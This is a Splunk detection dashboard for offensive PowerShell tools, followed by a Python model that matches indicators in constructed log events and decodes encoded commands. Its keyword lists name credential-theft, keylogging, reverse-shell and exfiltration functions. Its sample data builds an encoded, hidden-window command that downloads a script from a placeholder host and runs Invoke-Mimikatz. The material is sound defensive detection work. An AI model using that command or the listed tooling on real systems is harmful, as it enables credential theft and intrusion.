Splunk dashboard for Windows Event Collection - Offensive PowerShell
<form>
<label>Windows Event Collection - Offensive PowerShell</label>
<description>Detects offensive PowerShell tooling (PowerSploit, PowerView, PowerUp, Nishang, Empire, and raw Win32 API/token use) in the Windows PowerShell event logs. Not every result is malicious; hits require verification.</description>
<fieldset submitButton="false" autoRun="true">
<input type="time" token="time" searchWhenChanged="true">
<label>Time Range</label>
<default>
<earliest>-24h@h</earliest>
<latest>now</latest>
</default>
</input>
</fieldset>
<row>
<panel>
<title>Encoded Commands</title>
<table>
<search>
<query>index=windows LogName=*PowerShell* (TERM(*powershell*) TERM(*-enc*))
| rex field=_raw "HostApplication=(?&lt;op_hostapplication&gt;\w.+)"
| rex field=_raw "UserId=(?&lt;op_user&gt;\w.+)"
| search NOT (op_hostapplication="C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe -Embedding")
| stats values(ComputerName) as computer, values(ParameterBinding_Out_Default_) as out_text, values(op_user) as user, count(op_hostapplication) as count by op_hostapplication
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
<sampleRatio>1</sampleRatio>
</search>
</table>
</panel>
</row>
<row>
<panel>
<title>PowerSploit</title>
<table>
<title>https://github.com/PowerShellMafia/PowerSploit</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Add-NetUser)
OR TERM(Add-ObjectAcl)
OR TERM(Add-Persistence)
OR TERM(Add-ServiceDacl)
OR TERM(Convert-NameToSid)
OR TERM(Convert-NT4toCanonical)
OR TERM(Convert-SidToName)
OR TERM(Copy-ClonedFile)
OR TERM(Find-AVSignature)
OR TERM(Find-ComputerField)
OR TERM(Find-ForeignGroup)
OR TERM(Find-ForeignUser)
OR TERM(Find-GPOComputerAdmin)
OR TERM(Find-GPOLocation)
OR TERM(Find-InterestingFile)
OR TERM(Find-LocalAdminAccess)
OR TERM(Find-PathDLLHijack)
OR TERM(Find-ProcessDLLHijack)
OR TERM(Find-ManagedSecurityGroups)
OR TERM(Find-UserField)
OR TERM(Get-ADObject)
OR TERM(Get-ApplicationHost)
OR TERM(Get-CachedRDPConnection)
OR TERM(Get-ComputerDetails)
OR TERM(Get-ComputerProperty)
OR TERM(Get-CurrentUserTokenGroupSid)
OR TERM(Get-DFSshare)
OR TERM(Get-DomainPolicy)
OR TERM(Get-ExploitableSystem)
OR TERM(Get-GPPPassword)
OR TERM(Get-HttpStatus)
OR TERM(Get-Keystrokes)
OR TERM(Get-LastLoggedOn)
OR TERM(Get-ModifiablePath)
OR TERM(Get-ModifiableRegistryAutoRun)
OR TERM(Get-ModifiableScheduledTaskFile)
OR TERM(Get-ModifiableService)
OR TERM(Get-ModifiableServiceFile)
OR TERM(Get-NetComputer)
OR TERM(Get-NetDomain)
OR TERM(Get-NetDomainController)
OR TERM(Get-NetDomainTrust)
OR TERM(Get-NetFileServer)
OR TERM(Get-NetForest)
OR TERM(Get-NetForestCatalog)
OR TERM(Get-NetForestDomain)
OR TERM(Get-NetForestTrust)
OR TERM(Get-NetGPO)
OR TERM(Get-NetGPOGroup)
OR TERM(Get-NetGroup)
OR TERM(Get-NetGroupMember)
OR TERM(Get-NetLocalGroup)
OR TERM(Get-NetLoggedon)
OR TERM(Get-NetOU)
OR TERM(Get-NetProcess)
OR TERM(Get-NetRDPSession)
OR TERM(Get-NetSession)
OR TERM(Get-NetShare)
OR TERM(Get-NetSite)
OR TERM(Get-NetSubnet)
OR TERM(Get-NetUser)
OR TERM(Get-ObjectAcl)
OR TERM(Get-PathAcl)
OR TERM(Get-Proxy)
OR TERM(Get-RegistryAlwaysInstallElevated)
OR TERM(Get-RegistryAutoLogon)
OR TERM(Get-SecurityPackages)
OR TERM(Get-ServiceDetail)
OR TERM(Get-ServiceUnquoted)
OR TERM(Get-SiteListPassword)
OR TERM(Get-System)
OR TERM(Get-TimedScreenshot)
OR TERM(Get-UnattendedInstallFile)
OR TERM(Get-UserEvent)
OR TERM(Get-UserProperty)
OR TERM(Get-VaultCredential)
OR TERM(Get-VolumeShadowCopy)
OR TERM(Get-Webconfig)
OR TERM(Install-ServiceBinary)
OR TERM(Install-SSP)
OR TERM(Invoke-ACLScanner)
OR TERM(Invoke-AllChecks)
OR TERM(Invoke-CheckLocalAdminAccess)
OR TERM(Invoke-CredentialInjection)
OR TERM(Invoke-DllInjection)
OR TERM(Invoke-EnumerateLocalAdmin)
OR TERM(Invoke-EventHunter)
OR TERM(Invoke-FileFinder)
OR TERM(Invoke-MapDomainTrust)
OR TERM(Invoke-Mimikatz)
OR TERM(Invoke-NinjaCopy)
OR TERM(Invoke-Portscan)
OR TERM(Invoke-ProcessHunter)
OR TERM(Invoke-ReflectivePEInjection)
OR TERM(Invoke-ReverseDnsLookup)
OR TERM(Invoke-ServiceAbuse)
OR TERM(Invoke-ShareFinder)
OR TERM(Invoke-Shellcode)
OR TERM(Invoke-TokenManipulation)
OR TERM(Invoke-UserHunter)
OR TERM(Invoke-WmiCommand)
OR TERM(Mount-VolumeShadowCopy)
OR TERM(New-ElevatedPersistenceOption)
OR TERM(New-UserPersistenceOption)
OR TERM(New-VolumeShadowCopy)
OR TERM(Out-CompressedDll)
OR TERM(Out-EncodedCommand)
OR TERM(Out-EncryptedScript)
OR TERM(Out-Minidump)
OR TERM(Remove-Comments)
OR TERM(Remove-VolumeShadowCopy)
OR TERM(Restore-ServiceBinary)
OR TERM(Set-ADObject)
OR TERM(Set-CriticalProcess)
OR TERM(Set-MacAttribute)
OR TERM(Set-MasterBootRecord)
OR TERM(Set-ServiceBinPath)
OR TERM(Test-ServiceDaclPermission)
OR TERM(Write-HijackDll)
OR TERM(Write-ServiceBinary)
OR TERM(Write-UserAddMSI))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
<sampleRatio>1</sampleRatio>
</search>
</table>
</panel>
<panel>
<title>PowerView</title>
<table>
<title>https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Get-NetUser)
OR TERM(Get-NetGroup)
OR TERM(Get-NetGroupMember)
OR TERM(Get-NetLocalGroup)
OR TERM(Get-NetSession)
OR TERM(Invoke-UserHunter)
OR TERM(Get-NetOU)
OR TERM(Find-GPOLocation)
OR TERM(Get-NetGPOGroup)
OR TERM(Get-ObjectACL)
OR TERM(Add-ObjectACL)
OR TERM(Invoke-ACLScanner)
OR TERM(Set-ADObject)
OR TERM(Invoke-DowngradeAccount)
OR TERM(Get-NetForest)
OR TERM(Get-NetForestTrust)
OR TERM(Get-NetForestDomain)
OR TERM(Get-NetDomainTrust)
OR TERM(Invoke-MapDomainTrust))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
<sampleRatio>1</sampleRatio>
</search>
</table>
</panel>
</row>
<row>
<panel>
<title>PowerUp</title>
<table>
<title>https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Get-ServiceUnquoted)
OR TERM(Get-ServiceFilePermission)
OR TERM(Get-ServicePermission)
OR TERM(Invoke-ServiceAbuse)
OR TERM(Install-ServiceBinary)
OR TERM(Get-RegAutoLogon)
OR TERM(Get-VulnAutoRun)
OR TERM(Get-VulnSchTask)
OR TERM(Get-UnattendedInstallFile)
OR TERM(Get-WebConfig)
OR TERM(Get-ApplicationHost)
OR TERM(Get-RegAlwaysInstallElevated))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
</search>
<option name="drilldown">none</option>
</table>
</panel>
<panel>
<title>Nishang</title>
<table>
<title>https://github.com/samratashok/nishang</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Get-Unconstrained)
OR TERM(Add-RegBackdoor)
OR TERM(Add-ScrnSaveBackdoor)
OR TERM(Gupt-Backdoor)
OR TERM(Invoke-ADSBackdoor)
OR TERM(Enable-DuplicateToken)
OR TERM(Invoke-PsUACme)
OR TERM(Remove-Update)
OR TERM(Check-VM)
OR TERM(Copy-VSS)
OR TERM(Get-Information)
OR TERM(Get-LSASecret)
OR TERM(Get-PassHashes)
OR TERM(Invoke-Mimikatz)
OR TERM(Show-TargetScreen)
OR TERM(Port-Scan)
OR TERM(Invoke-PoshRatHttp)
OR TERM(Invoke-PowerShellTCP)
OR TERM(Invoke-PowerShellWMI)
OR TERM(Add-Exfiltration)
OR TERM(Add-Persistence)
OR TERM(Do-Exfiltration)
OR TERM(Start-CaptureServer))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
</search>
<option name="drilldown">none</option>
</table>
</panel>
</row>
<row>
<panel>
<title>PowerShell Empire</title>
<table>
<title>https://github.com/EmpireProject/Empire</title>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(Invoke-DllInjection)
OR TERM(Invoke-ReflectivePEInjection)
OR TERM(Invoke-ShellCode)
OR TERM(Get-ChromeDump)
OR TERM(Get-ClipboardContents)
OR TERM(Get-FoxDump)
OR TERM(Get-IndexedItem)
OR TERM(Get-Keystrokes)
OR TERM(Get-Screenshot)
OR TERM(Invoke-Inveigh)
OR TERM(Invoke-NetRipper)
OR TERM(Invoke-NinjaCopy)
OR TERM(Out-Minidump)
OR TERM(Invoke-EgressCheck)
OR TERM(Invoke-PostExfil)
OR TERM(Invoke-PSInject)
OR TERM(Invoke-RunAs)
OR TERM(MailRaider)
OR TERM(New-HoneyHash)
OR TERM(Set-MacAttribute)
OR TERM(Get-VaultCredential)
OR TERM(Invoke-DCSync)
OR TERM(Invoke-Mimikatz)
OR TERM(Invoke-PowerDump)
OR TERM(Invoke-TokenManipulation)
OR TERM(Exploit-Jboss)
OR TERM(Invoke-ThunderStruck)
OR TERM(Invoke-VoiceTroll)
OR TERM(Set-Wallpaper)
OR TERM(Invoke-InveighRelay)
OR TERM(Invoke-PsExec)
OR TERM(Invoke-SSHCommand)
OR TERM(Get-SecurityPackages)
OR TERM(Install-SSP)
OR TERM(Invoke-BackdoorLNK)
OR TERM(PowerBreach)
OR TERM(Get-GPPPassword)
OR TERM(Get-SiteListPassword)
OR TERM(Get-System)
OR TERM(Invoke-BypassUAC)
OR TERM(Invoke-Tater)
OR TERM(Invoke-WScriptBypassUAC)
OR TERM(PowerUp)
OR TERM(PowerView)
OR TERM(Get-RickAstley)
OR TERM(Find-Fruit)
OR TERM(HTTP-Login)
OR TERM(Find-TrustedDocuments)
OR TERM(Get-ComputerDetails)
OR TERM(Get-SystemDNSServer)
OR TERM(Invoke-Paranoia)
OR TERM(Invoke-WinEnum)
OR TERM(Get-SPN)
OR TERM(Invoke-ARPScan)
OR TERM(Invoke-PortScan)
OR TERM(Invoke-ReverseDNSLookup)
OR TERM(Invoke-SMBScanner))
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
</search>
<option name="drilldown">none</option>
</table>
</panel>
<panel>
<title>Libraries or Access Rights</title>
<table>
<search>
<query>index=windows host=* LogName="*PowerShell*" (TERM(AdjustTokenPrivileges)
OR TERM(IMAGE_NT_OPTIONAL_HDR64_MAGIC)
OR TERM(Management.Automation.RuntimeException)
OR TERM(Microsoft.Win32.UnsafeNativeMethods)
OR TERM(ReadProcessMemory.Invoke)
OR TERM(Runtime.InteropServices)
OR TERM(SE_PRIVILEGE_ENABLED)
OR TERM(System.Security.Cryptography)
OR TERM(System.Reflection.AssemblyName)
OR TERM(System.Runtime.InteropServices)
OR TERM(LSA_UNICODE_STRING)
OR TERM(MiniDumpWriteDump)
OR TERM(PAGE_EXECUTE_READ)
OR TERM(Net.Sockets.SocketFlags)
OR TERM(Reflection.Assembly)
OR TERM(SECURITY_DELEGATION)
OR TERM(TOKEN_ADJUST_PRIVILEGES)
OR TERM(TOKEN_ALL_ACCESS)
OR TERM(TOKEN_ASSIGN_PRIMARY)
OR TERM(TOKEN_DUPLICATE)
OR TERM(TOKEN_ELEVATION)
OR TERM(TOKEN_IMPERSONATE)
OR TERM(TOKEN_INFORMATION_CLASS)
OR TERM(TOKEN_PRIVILEGES)
OR TERM(TOKEN_QUERY)
OR TERM(Metasploit)
OR TERM(Advapi32.dll)
OR TERM(kernel32.dll)
OR TERM(msvcrt.dll)
OR TERM(ntdll.dll)
OR TERM(secur32.dll)
OR TERM(user32.dll))
| rex field=_raw "ScriptName=(?&lt;op_scriptname&gt;\w.+)"
| search NOT (op_scriptname=""
OR Path="C:\\WINDOWS\\CCM\\SystemTemp\\*-*-*-*-*.ps1")
| stats count by ComputerName
| sort - count</query>
<earliest>$time.earliest$</earliest>
<latest>$time.latest$</latest>
</search>
<option name="drilldown">cell</option>
</table>
</panel>
</row>
</form>
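Added example, not part of the gist above and not Splunk code: a small Python model of what the panels do, runnable offline against constructed events. It reproduces the Encoded Commands panel's `HostApplication=` extraction and its SCOM `MonitoringHost.exe -Embedding` allowlist, the indicator matching of the tool panels against a subset of their function names, and one step the SPL does not perform: decoding the base64-of-UTF-16LE payload that `-EncodedCommand` carries and matching indicators inside it, which a plaintext `TERM()` search over the raw event cannot see. It also accepts every switch spelling powershell.exe resolves to `-EncodedCommand` (`-e`, `-ec`, `-en`, `-enc`, ...), which the `*-enc*` pattern in the first panel does not. Assumptions: classic-format `Windows PowerShell` log events whose message carries `HostApplication=`, `ScriptName=` and (for EventCode 800) `UserId=` lines; the event texts, host names, the `CORP\jdoe` user and the `example.invalid` URL are constructed, and the indicator sets are a hand-picked subset of the names listed in the panels.

```python
import base64
import re

# Indicator lists: a subset of the function names and Win32 identifiers the
# dashboard panels above search for, grouped by panel. Substring matching here
# is broader than Splunk's TERM() token matching.
INDICATORS = {
    "PowerSploit": {"Invoke-Mimikatz", "Get-GPPPassword", "Invoke-ReflectivePEInjection",
                    "Invoke-TokenManipulation", "Get-NetUser", "Invoke-UserHunter"},
    "Nishang": {"Get-PassHashes", "Invoke-PowerShellTCP", "Enable-DuplicateToken"},
    "Empire": {"Invoke-DCSync", "Invoke-BypassUAC", "Get-Keystrokes", "Invoke-Mimikatz"},
    "Libraries or Access Rights": {"AdjustTokenPrivileges", "MiniDumpWriteDump",
                                   "TOKEN_ADJUST_PRIVILEGES", "kernel32.dll", "ntdll.dll"},
}

# Host application the Encoded Commands panel drops as known-benign (SCOM agent).
SCOM_HOSTAPP = r"C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe -Embedding"
HOSTAPP_ALLOWLIST = {SCOM_HOSTAPP}

# key=value lines of classic-format Windows PowerShell log events (EventCode 400/403/800).
KV_RE = re.compile(r"^\s*(ComputerName|LogName|EventCode|UserId|HostApplication|ScriptName)=(.*)$", re.M)

# A switch followed by a base64 blob. powershell.exe resolves -ec and any prefix of
# -EncodedCommand (-e, -en, -enc, ...) to it; -ep / -ex resolve to other parameters.
SWITCH_RE = re.compile(r"(?<!\S)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)


def is_encoded_switch(name):
    s = name.lower()
    return s == "ec" or "encodedcommand".startswith(s)


def encode_command(text):
    """Encode text as powershell.exe expects it for -EncodedCommand: base64 of UTF-16LE."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(hostapp):
    """Return the decoded -EncodedCommand payload from a command line, or None
    when there is none or the blob is not valid base64 / UTF-16LE."""
    for m in SWITCH_RE.finditer(hostapp):
        if not is_encoded_switch(m.group(1)):
            continue
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            return None
    return None


def match_indicators(text):
    """Map panel name -> sorted indicators found in text (case-insensitive substring match)."""
    low = text.lower()
    hits = {}
    for panel, names in INDICATORS.items():
        found = sorted(n for n in names if n.lower() in low)
        if found:
            hits[panel] = found
    return hits


def analyze_event(event):
    """Field extraction, allowlist and indicator matching for one event; None if allowlisted."""
    fields = {k: v.strip() for k, v in KV_RE.findall(event)}
    hostapp = fields.get("HostApplication", "")
    if hostapp in HOSTAPP_ALLOWLIST:
        return None
    decoded = decode_encoded_command(hostapp)
    # Match the raw event and, when present, the decoded payload, which a
    # plaintext TERM() search over the event cannot see.
    hits = match_indicators(event + "\n" + (decoded or ""))
    return {"computer": fields.get("ComputerName", ""), "user": fields.get("UserId", ""),
            "host_application": hostapp, "encoded": decoded is not None,
            "decoded": decoded, "hits": hits}


def scan(events):
    """Keep events that carry an encoded command or at least one indicator hit."""
    results = [analyze_event(e) for e in events]
    return [r for r in results if r and (r["encoded"] or r["hits"])]


def make_event(computer, code, details):
    """Constructed classic-format Windows PowerShell event (sample data, not a capture)."""
    return ("01/02/2024 10:15:00 AM\nLogName=Windows PowerShell\nSourceName=PowerShell\n"
            f"EventCode={code}\nComputerName={computer}\nUser=NOT_TRANSLATED\n"
            f"Message=Details:\n{details}\n")


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed payload; example.invalid is a reserved name, not a real host.
PAYLOAD = ("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/im.ps1'); "
           "Invoke-Mimikatz -DumpCreds")
HOSTAPP_ENC = f"{PS_EXE} -NoP -W Hidden -enc {encode_command(PAYLOAD)}"

SAMPLE_EVENTS = [
    make_event("WS01.corp.example", 400, f"\tNewEngineState=Available\n\tHostApplication={HOSTAPP_ENC}\n\tScriptName="),
    make_event("WS02.corp.example", 800, f"\tUserId=CORP\\jdoe\n\tHostApplication={PS_EXE}\n\tScriptName=\n"
                                          "\tCommandLine=Get-NetUser -SPN"),
    make_event("SRV01.corp.example", 400, f"\tHostApplication={SCOM_HOSTAPP}\n\tScriptName="),
    make_event("WS03.corp.example", 400, f"\tHostApplication={PS_EXE} -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1\n"
                                          "\tScriptName=C:\\Scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["computer"], r["user"] or "-", "encoded" if r["encoded"] else "plain", r["hits"])
```

Run it directly to print one row per flagged event. Of the four constructed events only the first two survive: the encoded one is flagged and its decoded payload reveals `Invoke-Mimikatz`, the EventCode 800 one matches `Get-NetUser` in plaintext (with `UserId` populated, which is where the first panel's `user` column comes from), the SCOM agent is dropped by the allowlist, and the `-ExecutionPolicy Bypass -File` run is neither encoded nor an indicator hit.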